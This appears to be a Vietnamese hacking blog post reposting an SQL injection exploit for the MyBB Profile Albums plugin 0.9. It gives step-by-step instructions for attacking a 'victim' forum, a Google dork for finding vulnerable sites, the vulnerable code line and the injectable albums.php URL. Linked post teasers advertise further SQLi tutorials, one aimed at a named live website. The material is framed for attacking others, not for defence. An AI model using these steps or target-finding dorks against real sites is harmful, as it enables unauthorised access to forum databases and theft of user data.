J2TEAM Security: A must-have extension for Chrome users. Install now!

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection | Juno_okyo's Blog
1 min read
Bug cho forum sài MyBB với cái Albums plugin version 0.9
Tut:
1. Tạo cái user trên forum victim.
2. Tạo cái Album rồi upload hình lên.
-> 2 bước trên để có được cái ID user và ID của album sử dụng cho bước thứ 3.

3. Điền ID user vào cái Valid_ID và điền cái ID của album vào cái Valid_album_ID rồi thêm lệnh SQL khai thác ở cuối.
link: .../albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within albums.php :

input['album'];
/*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'");
?>

/albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Image : http://i.imgur.com/yeAx0.png


Follow: https://twitter.com/PonyBlaze
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • ################################################## ###### # # Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy # # Author : IrIsT.Ir # # Discovered By : Am!r # # Home …
  • Phần Mềm: Thư viện điện tử - Thư viện số Libol Phiên Bản: <= 5.5 Vendor: CÔNG TY CỔ PHẦN CÔNG NGHỆ TINH VÂN Bug Report: MSSQL Injection Vulnerability. Mức Độ : Critical 1.Mô …
  • What Is SQL Injection? 1-Introduction 2-Understanding How Web Applications Work. 3-A Simple Application Architecture 4-A More Complex Architecture 5-Understanding SQL Injection 6-H…
  • Site này rewrite domain thành .html chứ thực ra là ASPX Tutorial: Get version http://gametienlen.net/gameonline/GA...t,@@VERSION)-- -.html Get data http://gametienlen.net/g…
  • Mình Thấy Nhưng Tút Này Rất Bổ Ích Cho Anh em Hack Lỗi Sqli Bằng Tay Nên Mình Tổng Hợp Nó Lại......Chi Sẻ Cho Anh em Mình Nghĩ Nó Chỉ Phù Hợp Với Newbie như mình...còn pro thì khỏi…
  • The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are…

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!